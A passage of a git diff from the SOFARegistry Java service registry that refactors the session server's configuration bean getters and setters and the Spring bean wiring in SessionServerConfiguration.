defaultSessionExecutorMaxPoolSize. - * - * @return property value of defaultSessionExecutorMaxPoolSize - */ - public int getDefaultSessionExecutorMaxPoolSize() { - return defaultSessionExecutorMaxPoolSize; - } - - /** - * Getter method for property defaultSessionExecutorKeepAliveTime. - * - * @return property value of defaultSessionExecutorKeepAliveTime - */ - public long getDefaultSessionExecutorKeepAliveTime() { - return defaultSessionExecutorKeepAliveTime; - } - - /** - * Setter method for property defaultSessionExecutorMinPoolSize. - * - * @param defaultSessionExecutorMinPoolSize value to be assigned to property defaultSessionExecutorMinPoolSize - */ - public void setDefaultSessionExecutorMinPoolSize(int defaultSessionExecutorMinPoolSize) { - this.defaultSessionExecutorMinPoolSize = defaultSessionExecutorMinPoolSize; - } - - /** - * Setter method for property defaultSessionExecutorMaxPoolSize. - * - * @param defaultSessionExecutorMaxPoolSize value to be assigned to property defaultSessionExecutorMaxPoolSize - */ - public void setDefaultSessionExecutorMaxPoolSize(int defaultSessionExecutorMaxPoolSize) { - this.defaultSessionExecutorMaxPoolSize = defaultSessionExecutorMaxPoolSize; - } - - /** - * Setter method for property defaultSessionExecutorKeepAliveTime. - * - * @param defaultSessionExecutorKeepAliveTime value to be assigned to property defaultSessionExecutorKeepAliveTime - */ - public void setDefaultSessionExecutorKeepAliveTime(long defaultSessionExecutorKeepAliveTime) { - this.defaultSessionExecutorKeepAliveTime = defaultSessionExecutorKeepAliveTime; - } - - /** - * Getter method for property disconnectClientExecutorMinPoolSize. - * - * @return property value of disconnectClientExecutorMinPoolSize - */ - @Override - public int getDisconnectClientExecutorMinPoolSize() { - return disconnectClientExecutorMinPoolSize; - } - - /** - * Setter method for property disconnectClientExecutorMinPoolSize. - * - * @param disconnectClientExecutorMinPoolSize value to be assigned to property disconnectClientExecutorMinPoolSize - */ - public void setDisconnectClientExecutorMinPoolSize(int disconnectClientExecutorMinPoolSize) { - this.disconnectClientExecutorMinPoolSize = disconnectClientExecutorMinPoolSize; - } - - /** - * Getter method for property disconnectClientExecutorMaxPoolSize. - * - * @return property value of disconnectClientExecutorMaxPoolSize - */ - @Override - public int getDisconnectClientExecutorMaxPoolSize() { - return disconnectClientExecutorMaxPoolSize; - } - - /** - * Setter method for property disconnectClientExecutorMaxPoolSize. - * - * @param disconnectClientExecutorMaxPoolSize value to be assigned to property disconnectClientExecutorMaxPoolSize - */ - public void setDisconnectClientExecutorMaxPoolSize(int disconnectClientExecutorMaxPoolSize) { - this.disconnectClientExecutorMaxPoolSize = disconnectClientExecutorMaxPoolSize; - } - - /** - * Getter method for property disconnectClientExecutorQueueSize. - * - * @return property value of disconnectClientExecutorQueueSize - */ - @Override - public int getDisconnectClientExecutorQueueSize() { - return disconnectClientExecutorQueueSize; - } - - /** - * Setter method for property disconnectClientExecutorQueueSize. - * - * @param disconnectClientExecutorQueueSize value to be assigned to property disconnectClientExecutorQueueSize - */ - public void setDisconnectClientExecutorQueueSize(int disconnectClientExecutorQueueSize) { - this.disconnectClientExecutorQueueSize = disconnectClientExecutorQueueSize; - } - - /** - * Getter method for property dataChangeFetchTaskMaxBufferSize. - * - * @return property value of dataChangeFetchTaskMaxBufferSize - */ - @Override - public int getDataChangeFetchTaskMaxBufferSize() { - return dataChangeFetchTaskMaxBufferSize; - } - - /** - * Setter method for property dataChangeFetchTaskMaxBufferSize. - * - * @param dataChangeFetchTaskMaxBufferSize value to be assigned to property dataChangeFetchTaskMaxBufferSize - */ - public void setDataChangeFetchTaskMaxBufferSize(int dataChangeFetchTaskMaxBufferSize) { - this.dataChangeFetchTaskMaxBufferSize = dataChangeFetchTaskMaxBufferSize; - } - - /** - * Getter method for property dataChangeFetchTaskWorkerSize. - * - * @return property value of dataChangeFetchTaskWorkerSize - */ - @Override - public int getDataChangeFetchTaskWorkerSize() { - return dataChangeFetchTaskWorkerSize; - } - - /** - * Setter method for property dataChangeFetchTaskWorkerSize. - * - * @param dataChangeFetchTaskWorkerSize value to be assigned to property dataChangeFetchTaskWorkerSize - */ - public void setDataChangeFetchTaskWorkerSize(int dataChangeFetchTaskWorkerSize) { - this.dataChangeFetchTaskWorkerSize = dataChangeFetchTaskWorkerSize; - } - - /** - * Getter method for property userDataPushRetryWheelTicksSize. - * - * @return property value of userDataPushRetryWheelTicksSize - */ - @Override - public int getUserDataPushRetryWheelTicksSize() { - return userDataPushRetryWheelTicksSize; - } - - /** - * Setter method for property userDataPushRetryWheelTicksSize. - * - * @param userDataPushRetryWheelTicksSize value to be assigned to property userDataPushRetryWheelTicksSize - */ - public void setUserDataPushRetryWheelTicksSize(int userDataPushRetryWheelTicksSize) { - this.userDataPushRetryWheelTicksSize = userDataPushRetryWheelTicksSize; - } - - /** - * Getter method for property userDataPushRetryWheelTicksDuration. - * - * @return property value of userDataPushRetryWheelTicksDuration - */ - @Override - public int getUserDataPushRetryWheelTicksDuration() { - return userDataPushRetryWheelTicksDuration; - } - - /** - * Setter method for property userDataPushRetryWheelTicksDuration. - * - * @param userDataPushRetryWheelTicksDuration value to be assigned to property userDataPushRetryWheelTicksDuration - */ - public void setUserDataPushRetryWheelTicksDuration(int userDataPushRetryWheelTicksDuration) { - this.userDataPushRetryWheelTicksDuration = userDataPushRetryWheelTicksDuration; - } - - /** - * Getter method for property pushDataTaskRetryFirstDelay. - * - * @return property value of pushDataTaskRetryFirstDelay - */ - @Override - public int getPushDataTaskRetryFirstDelay() { - return pushDataTaskRetryFirstDelay; - } - - /** - * Setter method for property pushDataTaskRetryFirstDelay. - * - * @param pushDataTaskRetryFirstDelay value to be assigned to property pushDataTaskRetryFirstDelay - */ - public void setPushDataTaskRetryFirstDelay(int pushDataTaskRetryFirstDelay) { - this.pushDataTaskRetryFirstDelay = pushDataTaskRetryFirstDelay; - } - - /** - * Getter method for property pushDataTaskRetryIncrementDelay. - * - * @return property value of pushDataTaskRetryIncrementDelay - */ - @Override - public long getPushDataTaskRetryIncrementDelay() { - return pushDataTaskRetryIncrementDelay; - } - - /** - * Setter method for property pushDataTaskRetryIncrementDelay. - * - * @param pushDataTaskRetryIncrementDelay value to be assigned to property pushDataTaskRetryIncrementDelay - */ - public void setPushDataTaskRetryIncrementDelay(long pushDataTaskRetryIncrementDelay) { - this.pushDataTaskRetryIncrementDelay = pushDataTaskRetryIncrementDelay; - } - - @Override - public boolean isInvalidForeverZone(String zoneId) { - - String[] zoneNameArr = getInvalidForeverZones().split(";"); - if (invalidForeverZonesSet == null) { - invalidForeverZonesSet = new HashSet<>(); - for (String str : zoneNameArr) { - if (str.trim().length() > 0) { - invalidForeverZonesSet.add(str); - } - } - } - - return invalidForeverZonesSet.contains(zoneId); - } - - @Override - public boolean isInvalidIgnored(String dataId) { - - String invalidIgnoreDataidRegex = getInvalidIgnoreDataidRegex(); - if (null != invalidIgnoreDataidRegex && !invalidIgnoreDataidRegex.isEmpty()) { - invalidIgnoreDataIdPattern = Pattern.compile(invalidIgnoreDataidRegex); - } - - return null != invalidIgnoreDataIdPattern - && invalidIgnoreDataIdPattern.matcher(dataId).find(); - } - - public static int cpus() { - return Runtime.getRuntime().availableProcessors(); - } -} \ No newline at end of file + } + invalidForeverZonesSet = set; + } + return invalidForeverZonesSet.contains(zoneId); + } + + @Override + public boolean isInvalidIgnored(String dataId) { + + String invalidIgnoreDataidRegex = getInvalidIgnoreDataidRegex(); + if (null != invalidIgnoreDataidRegex && !invalidIgnoreDataidRegex.isEmpty()) { + invalidIgnoreDataIdPattern = Pattern.compile(invalidIgnoreDataidRegex); + } + + return null != invalidIgnoreDataIdPattern && invalidIgnoreDataIdPattern.matcher(dataId).find(); + } + + /** + * Getter method for property sessionSchedulerPoolSize. + * + * @return property value of sessionSchedulerPoolSize + */ + @Override + public int getSessionSchedulerPoolSize() { + return sessionSchedulerPoolSize; + } + + /** + * Setter method for property sessionSchedulerPoolSize . + * + * @param sessionSchedulerPoolSize value to be assigned to property sessionSchedulerPoolSize + */ + public void setSessionSchedulerPoolSize(int sessionSchedulerPoolSize) { + this.sessionSchedulerPoolSize = sessionSchedulerPoolSize; + } + + /** + * Getter method for property dataNodeExchangeForFetchDatumTimeOut. + * + * @return property value of dataNodeExchangeForFetchDatumTimeOut + */ + public int getDataNodeExchangeForFetchDatumTimeoutMillis() { + return dataNodeExchangeForFetchDatumTimeoutMillis; + } + + /** + * Setter method for property dataNodeExchangeForFetchDatumTimeOut . + * + * @param dataNodeExchangeForFetchDatumTimeoutMillis value to be assigned to property + * dataNodeExchangeForFetchDatumTimeOut + */ + public void setDataNodeExchangeForFetchDatumTimeoutMillis( + int dataNodeExchangeForFetchDatumTimeoutMillis) { + this.dataNodeExchangeForFetchDatumTimeoutMillis = dataNodeExchangeForFetchDatumTimeoutMillis; + } + + /** + * Getter method for property slotSyncPublisherMaxNum. + * + * @return property value of slotSyncPublisherMaxNum + */ + @Override + public int getSlotSyncPublisherMaxNum() { + return slotSyncPublisherMaxNum; + } + + @Override + public Collection getMetaServerAddresses() { + final Collection addresses = metaAddresses; + if (addresses != null) { + return addresses; + } + metaAddresses = + ServerEnv.getMetaAddresses(commonConfig.getMetaNode(), commonConfig.getLocalDataCenter()); + return metaAddresses; + } + + /** + * Setter method for property slotSyncPublisherMaxNum. + * + * @param slotSyncPublisherMaxNum value to be assigned to property slotSyncPublisherMaxNum + */ + public void setSlotSyncPublisherMaxNum(int slotSyncPublisherMaxNum) { + this.slotSyncPublisherMaxNum = slotSyncPublisherMaxNum; + } + + /** + * Getter method for property schedulerScanVersionIntervalMs. + * + * @return property value of schedulerScanVersionIntervalMs + */ + @Override + public int getSchedulerScanVersionIntervalMillis() { + return schedulerScanVersionIntervalMillis; + } + + /** + * Setter method for property schedulerScanVersionIntervalMs. + * + * @param schedulerScanVersionIntervalMs value to be assigned to property + * schedulerScanVersionIntervalMs + */ + public void setSchedulerFetchDataVersionIntervalMs(int schedulerScanVersionIntervalMs) { + this.schedulerScanVersionIntervalMillis = schedulerScanVersionIntervalMs; + } + + public int getSlotSyncMaxBufferSize() { + return slotSyncMaxBufferSize; + } + + public void setSlotSyncMaxBufferSize(int slotSyncMaxBufferSize) { + this.slotSyncMaxBufferSize = slotSyncMaxBufferSize; + } + + public int getSlotSyncWorkerSize() { + return slotSyncWorkerSize; + } + + @Override + public int getCacheDigestIntervalMinutes() { + return cacheDigestIntervalMinutes; + } + + public void setCacheDigestIntervalMinutes(int cacheDigestIntervalMinutes) { + this.cacheDigestIntervalMinutes = cacheDigestIntervalMinutes; + } + + public void setSlotSyncWorkerSize(int slotSyncWorkerSize) { + this.slotSyncWorkerSize = slotSyncWorkerSize; + } + + @Override + public String toString() { + return ToStringBuilder.reflectionToString(this, ToStringStyle.MULTI_LINE_STYLE); + } + + @Override + public int getDataNodeExecutorWorkerSize() { + return dataNodeExecutorWorkerSize; + } + + public void setDataNodeExecutorWorkerSize(int dataNodeExecutorWorkerSize) { + this.dataNodeExecutorWorkerSize = dataNodeExecutorWorkerSize; + } + + @Override + public int getDataNodeExecutorQueueSize() { + return dataNodeExecutorQueueSize; + } + + public void setDataNodeExecutorQueueSize(int dataNodeExecutorQueueSize) { + this.dataNodeExecutorQueueSize = dataNodeExecutorQueueSize; + } + + @Override + public int getDataNodeRetryBackoffMillis() { + return dataNodeRetryBackoffMillis; + } + + public void setDataNodeRetryBackoffMillis(int dataNodeRetryBackoffMillis) { + this.dataNodeRetryBackoffMillis = dataNodeRetryBackoffMillis; + } + + @Override + public int getDataNodeRetryTimes() { + return dataNodeRetryTimes; + } + + public void setDataNodeRetryTimes(int dataNodeRetryTimes) { + this.dataNodeRetryTimes = dataNodeRetryTimes; + } + + @Override + public int getDataNodeRetryQueueSize() { + return dataNodeRetryQueueSize; + } + + public void setDataNodeRetryQueueSize(int dataNodeRetryQueueSize) { + this.dataNodeRetryQueueSize = dataNodeRetryQueueSize; + } + + @Override + public int getDataNodeMaxBatchSize() { + return dataNodeMaxBatchSize; + } + + public void setDataNodeMaxBatchSize(int dataNodeMaxBatchSize) { + this.dataNodeMaxBatchSize = dataNodeMaxBatchSize; + } + + @Override + public int getCacheCountIntervalSecs() { + return cacheCountIntervalSecs; + } + + public void setCacheCountIntervalSecs(int cacheCountIntervalSecs) { + this.cacheCountIntervalSecs = cacheCountIntervalSecs; + } + + @Override + public int getCacheDatumMaxNums() { + return cacheDatumMaxNums; + } + + public void setCacheDatumMaxNums(int cacheDatumMaxNums) { + this.cacheDatumMaxNums = cacheDatumMaxNums; + } + + @Override + public int getCacheDatumExpireSecs() { + return cacheDatumExpireSecs; + } + + public void setCacheDatumExpireSecs(int cacheDatumExpireSecs) { + this.cacheDatumExpireSecs = cacheDatumExpireSecs; + } + + @Override + public int getSyncSessionIOLowWaterMark() { + return syncSessionIOLowWaterMark; + } + + public void setSyncSessionIOLowWaterMark(int syncSessionIOLowWaterMark) { + this.syncSessionIOLowWaterMark = syncSessionIOLowWaterMark; + } + + @Override + public int getSyncSessionIOHighWaterMark() { + return syncSessionIOHighWaterMark; + } + + public void setSyncSessionIOHighWaterMark(int syncSessionIOHighWaterMark) { + this.syncSessionIOHighWaterMark = syncSessionIOHighWaterMark; + } + + /** + * Getter method for property heartbeatCacheCheckerInitialDelaySecs. + * + * @return property value of heartbeatCacheCheckerInitialDelaySecs + */ + public int getHeartbeatCacheCheckerInitialDelaySecs() { + return heartbeatCacheCheckerInitialDelaySecs; + } + + /** + * Setter method for property heartbeatCacheCheckerInitialDelaySecs. + * + * @param heartbeatCacheCheckerInitialDelaySecs value to be assigned to property + * heartbeatCacheCheckerInitialDelaySecs + */ + public void setHeartbeatCacheCheckerInitialDelaySecs(int heartbeatCacheCheckerInitialDelaySecs) { + this.heartbeatCacheCheckerInitialDelaySecs = heartbeatCacheCheckerInitialDelaySecs; + } + + /** + * Getter method for property heartbeatCacheCheckerSecs. + * + * @return property value of heartbeatCacheCheckerSecs + */ + public int getHeartbeatCacheCheckerSecs() { + return heartbeatCacheCheckerSecs; + } + + /** + * Setter method for property heartbeatCacheCheckerSecs. + * + * @param heartbeatCacheCheckerSecs value to be assigned to property heartbeatCacheCheckerSecs + */ + public void setHeartbeatCacheCheckerSecs(int heartbeatCacheCheckerSecs) { + this.heartbeatCacheCheckerSecs = heartbeatCacheCheckerSecs; + } + + /** + * Getter method for property revisionHeartbeatInitialDelayMinutes. + * + * @return property value of revisionHeartbeatInitialDelayMinutes + */ + public int getRevisionHeartbeatInitialDelayMinutes() { + return revisionHeartbeatInitialDelayMinutes; + } + + /** + * Setter method for property revisionHeartbeatInitialDelayMinutes. + * + * @param revisionHeartbeatInitialDelayMinutes value to be assigned to property + * revisionHeartbeatInitialDelayMinutes + */ + public void setRevisionHeartbeatInitialDelayMinutes(int revisionHeartbeatInitialDelayMinutes) { + this.revisionHeartbeatInitialDelayMinutes = revisionHeartbeatInitialDelayMinutes; + } + + /** + * Getter method for property revisionHeartbeatMinutes. + * + * @return property value of revisionHeartbeatMinutes + */ + public int getRevisionHeartbeatMinutes() { + return revisionHeartbeatMinutes; + } + + /** + * Setter method for property revisionHeartbeatMinutes. + * + * @param revisionHeartbeatMinutes value to be assigned to property revisionHeartbeatMinutes + */ + public void setRevisionHeartbeatMinutes(int revisionHeartbeatMinutes) { + this.revisionHeartbeatMinutes = revisionHeartbeatMinutes; + } + + @Override + public int getAccessMetadataMaxBufferSize() { + return accessMetadataMaxBufferSize; + } + + public void setAccessMetadataMaxBufferSize(int accessMetadataMaxBufferSize) { + this.accessMetadataMaxBufferSize = accessMetadataMaxBufferSize; + } + + @Override + public int getAccessMetadataWorkerSize() { + return accessMetadataWorkerSize; + } + + public void setAccessMetadataWorkerSize(int accessMetadataWorkerSize) { + this.accessMetadataWorkerSize = accessMetadataWorkerSize; + } + + @Override + public int getMetaNodeBufferSize() { + return metaNodeBufferSize; + } + + public void setMetaNodeBufferSize(int metaNodeBufferSize) { + this.metaNodeBufferSize = metaNodeBufferSize; + } + + @Override + public int getMetaNodeWorkerSize() { + return metaNodeWorkerSize; + } + + public void setMetaNodeWorkerSize(int metaNodeWorkerSize) { + this.metaNodeWorkerSize = metaNodeWorkerSize; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfiguration.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfiguration.java index 63dff75e1..54c71f778 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfiguration.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/bootstrap/SessionServerConfiguration.java @@ -16,99 +16,132 @@ */ package com.alipay.sofa.registry.server.session.bootstrap; +import com.alipay.sofa.registry.jdbc.config.JdbcConfiguration; +import com.alipay.sofa.registry.jraft.config.RaftConfiguration; import com.alipay.sofa.registry.remoting.bolt.exchange.BoltExchange; import com.alipay.sofa.registry.remoting.exchange.Exchange; import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; import com.alipay.sofa.registry.remoting.jersey.exchange.JerseyExchange; +import com.alipay.sofa.registry.server.session.acceptor.WriteDataAcceptor; +import com.alipay.sofa.registry.server.session.acceptor.WriteDataAcceptorImpl; import com.alipay.sofa.registry.server.session.cache.CacheGenerator; import com.alipay.sofa.registry.server.session.cache.CacheService; import com.alipay.sofa.registry.server.session.cache.DatumCacheGenerator; import com.alipay.sofa.registry.server.session.cache.SessionCacheService; -import com.alipay.sofa.registry.server.session.listener.CancelDataTaskListener; -import com.alipay.sofa.registry.server.session.listener.DataChangeFetchCloudTaskListener; -import com.alipay.sofa.registry.server.session.listener.DataChangeFetchTaskListener; -import com.alipay.sofa.registry.server.session.listener.DataPushTaskListener; +import com.alipay.sofa.registry.server.session.connections.ConnectionsService; +import com.alipay.sofa.registry.server.session.filter.DataIdMatchStrategy; +import com.alipay.sofa.registry.server.session.filter.IPMatchStrategy; +import com.alipay.sofa.registry.server.session.filter.ProcessFilter; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistManager; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistManagerImpl; +import com.alipay.sofa.registry.server.session.filter.blacklist.BlacklistMatchProcessFilter; +import com.alipay.sofa.registry.server.session.filter.blacklist.DefaultDataIdMatchStrategy; +import com.alipay.sofa.registry.server.session.filter.blacklist.DefaultIPMatchStrategy; +import com.alipay.sofa.registry.server.session.limit.AccessLimitService; +import com.alipay.sofa.registry.server.session.limit.AccessLimitServiceImpl; import com.alipay.sofa.registry.server.session.listener.ProvideDataChangeFetchTaskListener; import com.alipay.sofa.registry.server.session.listener.ReceivedConfigDataPushTaskListener; -import com.alipay.sofa.registry.server.session.listener.ReceivedDataMultiPushTaskListener; -import com.alipay.sofa.registry.server.session.listener.SessionRegisterDataTaskListener; -import com.alipay.sofa.registry.server.session.listener.SubscriberMultiFetchTaskListener; -import com.alipay.sofa.registry.server.session.listener.SubscriberRegisterFetchTaskListener; import com.alipay.sofa.registry.server.session.listener.WatcherRegisterFetchTaskListener; -import com.alipay.sofa.registry.server.session.node.DataNodeManager; -import com.alipay.sofa.registry.server.session.node.MetaNodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManagerFactory; -import com.alipay.sofa.registry.server.session.node.RaftClientManager; -import com.alipay.sofa.registry.server.session.node.SessionNodeManager; +import com.alipay.sofa.registry.server.session.mapper.ConnectionMapper; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionCacheRegistry; +import com.alipay.sofa.registry.server.session.metadata.AppRevisionHeartbeatRegistry; import com.alipay.sofa.registry.server.session.node.processor.ClientNodeSingleTaskProcessor; import com.alipay.sofa.registry.server.session.node.processor.ConsoleSyncSingleTaskProcessor; -import com.alipay.sofa.registry.server.session.node.processor.DataNodeSingleTaskProcessor; import com.alipay.sofa.registry.server.session.node.processor.MetaNodeSingleTaskProcessor; import com.alipay.sofa.registry.server.session.node.service.ClientNodeService; import com.alipay.sofa.registry.server.session.node.service.ClientNodeServiceImpl; import com.alipay.sofa.registry.server.session.node.service.DataNodeService; import com.alipay.sofa.registry.server.session.node.service.DataNodeServiceImpl; -import com.alipay.sofa.registry.server.session.node.service.MetaNodeService; -import com.alipay.sofa.registry.server.session.node.service.MetaNodeServiceImpl; +import com.alipay.sofa.registry.server.session.node.service.MetaServerServiceImpl; +import com.alipay.sofa.registry.server.session.node.service.SessionMetaServerManager; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessor; +import com.alipay.sofa.registry.server.session.provideData.ProvideDataProcessorManager; +import com.alipay.sofa.registry.server.session.provideData.processor.BlackListProvideDataProcessor; +import com.alipay.sofa.registry.server.session.provideData.processor.StopPushProvideDataProcessor; +import com.alipay.sofa.registry.server.session.push.ChangeProcessor; +import com.alipay.sofa.registry.server.session.push.FirePushService; +import com.alipay.sofa.registry.server.session.push.PushDataGenerator; +import com.alipay.sofa.registry.server.session.push.PushProcessor; import com.alipay.sofa.registry.server.session.registry.Registry; import com.alipay.sofa.registry.server.session.registry.SessionRegistry; import com.alipay.sofa.registry.server.session.remoting.ClientNodeExchanger; import com.alipay.sofa.registry.server.session.remoting.DataNodeExchanger; -import com.alipay.sofa.registry.server.session.remoting.MetaNodeExchanger; -import com.alipay.sofa.registry.server.session.remoting.handler.AbstractClientHandler; -import com.alipay.sofa.registry.server.session.remoting.handler.AbstractServerHandler; +import com.alipay.sofa.registry.server.session.remoting.DataNodeNotifyExchanger; import com.alipay.sofa.registry.server.session.remoting.handler.CancelAddressRequestHandler; import com.alipay.sofa.registry.server.session.remoting.handler.ClientNodeConnectionHandler; import com.alipay.sofa.registry.server.session.remoting.handler.DataChangeRequestHandler; -import com.alipay.sofa.registry.server.session.remoting.handler.DataNodeConnectionHandler; import com.alipay.sofa.registry.server.session.remoting.handler.DataPushRequestHandler; -import com.alipay.sofa.registry.server.session.remoting.handler.MetaNodeConnectionHandler; -import com.alipay.sofa.registry.server.session.remoting.handler.NodeChangeResultHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.DataSlotDiffDigestRequestHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.DataSlotDiffPublisherRequestHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.GetRevisionPbHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.MetaRevisionHeartbeatPbHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.MetadataRegisterPbHandler; import com.alipay.sofa.registry.server.session.remoting.handler.NotifyProvideDataChangeHandler; import com.alipay.sofa.registry.server.session.remoting.handler.PublisherHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.PublisherPbHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.ServiceAppMappingPbHandler; import com.alipay.sofa.registry.server.session.remoting.handler.SubscriberHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.SubscriberPbHandler; import com.alipay.sofa.registry.server.session.remoting.handler.SyncConfigHandler; +import com.alipay.sofa.registry.server.session.remoting.handler.SyncConfigPbHandler; import com.alipay.sofa.registry.server.session.remoting.handler.WatcherHandler; +import com.alipay.sofa.registry.server.session.resource.ClientManagerResource; import com.alipay.sofa.registry.server.session.resource.ClientsOpenResource; +import com.alipay.sofa.registry.server.session.resource.ConnectionsResource; import com.alipay.sofa.registry.server.session.resource.HealthResource; import com.alipay.sofa.registry.server.session.resource.SessionDigestResource; import com.alipay.sofa.registry.server.session.resource.SessionOpenResource; -import com.alipay.sofa.registry.server.session.scheduler.ExecutorManager; +import com.alipay.sofa.registry.server.session.scheduler.timertask.CacheCountTask; +import com.alipay.sofa.registry.server.session.scheduler.timertask.SessionCacheDigestTask; import com.alipay.sofa.registry.server.session.scheduler.timertask.SyncClientsHeartbeatTask; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.session.slot.SlotTableCacheImpl; import com.alipay.sofa.registry.server.session.store.DataStore; import com.alipay.sofa.registry.server.session.store.Interests; -import com.alipay.sofa.registry.server.session.store.SessionDataStore; import com.alipay.sofa.registry.server.session.store.SessionInterests; import com.alipay.sofa.registry.server.session.store.SessionWatchers; +import com.alipay.sofa.registry.server.session.store.SlotSessionDataStore; import com.alipay.sofa.registry.server.session.store.Watchers; -import com.alipay.sofa.registry.server.session.strategy.DataChangeRequestHandlerStrategy; +import com.alipay.sofa.registry.server.session.strategy.AppRevisionHandlerStrategy; +import com.alipay.sofa.registry.server.session.strategy.DefaultAppRevisionHandlerStrategy; import com.alipay.sofa.registry.server.session.strategy.PublisherHandlerStrategy; import com.alipay.sofa.registry.server.session.strategy.ReceivedConfigDataPushTaskStrategy; -import com.alipay.sofa.registry.server.session.strategy.ReceivedDataMultiPushTaskStrategy; import com.alipay.sofa.registry.server.session.strategy.SessionRegistryStrategy; import com.alipay.sofa.registry.server.session.strategy.SubscriberHandlerStrategy; -import com.alipay.sofa.registry.server.session.strategy.SubscriberMultiFetchTaskStrategy; -import com.alipay.sofa.registry.server.session.strategy.SubscriberRegisterFetchTaskStrategy; import com.alipay.sofa.registry.server.session.strategy.SyncConfigHandlerStrategy; -import com.alipay.sofa.registry.server.session.strategy.TaskMergeProcessorStrategy; import com.alipay.sofa.registry.server.session.strategy.WatcherHandlerStrategy; -import com.alipay.sofa.registry.server.session.strategy.impl.DefaultDataChangeRequestHandlerStrategy; import com.alipay.sofa.registry.server.session.strategy.impl.DefaultPublisherHandlerStrategy; -import com.alipay.sofa.registry.server.session.strategy.impl.DefaultPushTaskMergeProcessor; import com.alipay.sofa.registry.server.session.strategy.impl.DefaultReceivedConfigDataPushTaskStrategy; -import com.alipay.sofa.registry.server.session.strategy.impl.DefaultReceivedDataMultiPushTaskStrategy; import com.alipay.sofa.registry.server.session.strategy.impl.DefaultSessionRegistryStrategy; import com.alipay.sofa.registry.server.session.strategy.impl.DefaultSubscriberHandlerStrategy; -import com.alipay.sofa.registry.server.session.strategy.impl.DefaultSubscriberMultiFetchTaskStrategy; -import com.alipay.sofa.registry.server.session.strategy.impl.DefaultSubscriberRegisterFetchTaskStrategy; import com.alipay.sofa.registry.server.session.strategy.impl.DefaultSyncConfigHandlerStrategy; import com.alipay.sofa.registry.server.session.strategy.impl.DefaultWatcherHandlerStrategy; +import com.alipay.sofa.registry.server.session.wrapper.AccessLimitWrapperInterceptor; +import com.alipay.sofa.registry.server.session.wrapper.BlacklistWrapperInterceptor; +import com.alipay.sofa.registry.server.session.wrapper.ClientCheckWrapperInterceptor; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInterceptor; +import com.alipay.sofa.registry.server.session.wrapper.WrapperInterceptorManager; +import com.alipay.sofa.registry.server.shared.meta.MetaServerManager; +import com.alipay.sofa.registry.server.shared.meta.MetaServerService; +import com.alipay.sofa.registry.server.shared.remoting.AbstractClientHandler; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import com.alipay.sofa.registry.server.shared.remoting.SlotTableChangeEventHandler; +import com.alipay.sofa.registry.server.shared.resource.MetricsResource; +import com.alipay.sofa.registry.server.shared.resource.RegistryOpsResource; +import com.alipay.sofa.registry.server.shared.resource.SlotGenericResource; +import com.alipay.sofa.registry.server.shared.slot.DiskSlotTableRecorder; +import com.alipay.sofa.registry.task.MetricsableThreadPoolExecutor; import com.alipay.sofa.registry.task.batcher.TaskProcessor; import com.alipay.sofa.registry.task.listener.DefaultTaskListenerManager; import com.alipay.sofa.registry.task.listener.TaskListener; import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import com.alipay.sofa.registry.util.NamedThreadFactory; import com.alipay.sofa.registry.util.PropertySplitter; +import java.util.ArrayList; +import java.util.Collection; +import java.util.concurrent.ArrayBlockingQueue; +import java.util.concurrent.ThreadPoolExecutor; +import java.util.concurrent.TimeUnit; import org.glassfish.jersey.jackson.JacksonFeature; import org.glassfish.jersey.server.ResourceConfig; import org.springframework.boot.autoconfigure.condition.ConditionalOnMissingBean; @@ -117,489 +150,623 @@ import org.springframework.context.annotation.Configuration; import org.springframework.context.annotation.Import; -import java.util.ArrayList; -import java.util.Collection; - /** - * * @author shangyu.wh * @version $Id: SessionServerConfiguration.java, v 0.1 2017-11-14 11:39 synex Exp $ */ @Configuration -@Import(SessionServerInitializer.class) +@Import({SessionServerInitializer.class, JdbcConfiguration.class, RaftConfiguration.class}) @EnableConfigurationProperties public class SessionServerConfiguration { + @Bean + @ConditionalOnMissingBean + public SessionServerBootstrap sessionServerBootstrap() { + return new SessionServerBootstrap(); + } + + @Configuration + public static class SessionServerConfigBeanConfiguration { + @Bean + public CommonConfig commonConfig() { + return new CommonConfig(); + } + + @Bean + @ConditionalOnMissingBean + public SessionServerConfig sessionServerConfig(CommonConfig commonConfig) { + return new SessionServerConfigBean(commonConfig); + } + + @Bean(name = "PropertySplitter") + public PropertySplitter propertySplitter() { + return new PropertySplitter(); + } + + @Bean + public DiskSlotTableRecorder diskSlotTableRecorder() { + return new DiskSlotTableRecorder(); + } + } + + @Configuration + public static class SessionRemotingConfiguration { + + @Bean + @ConditionalOnMissingBean(name = "boltExchange") + public Exchange boltExchange() { + return new BoltExchange(); + } + + @Bean + public Exchange jerseyExchange() { + return new JerseyExchange(); + } + + @Bean + public NodeExchanger clientNodeExchanger() { + return new ClientNodeExchanger(); + } + + @Bean + public DataNodeExchanger dataNodeExchanger() { + return new DataNodeExchanger(); + } + + @Bean + public DataNodeNotifyExchanger dataNodeNotifyExchanger() { + return new DataNodeNotifyExchanger(); + } + + @Bean + public MetaServerManager metaServerManager() { + return new SessionMetaServerManager(); + } + + @Bean + public SlotTableCache slotTableCache() { + return new SlotTableCacheImpl(); + } + + @Bean(name = "serverHandlers") + public Collection serverHandlers() { + Collection list = new ArrayList<>(); + list.add(publisherHandler()); + list.add(subscriberHandler()); + list.add(watcherHandler()); + list.add(clientNodeConnectionHandler()); + 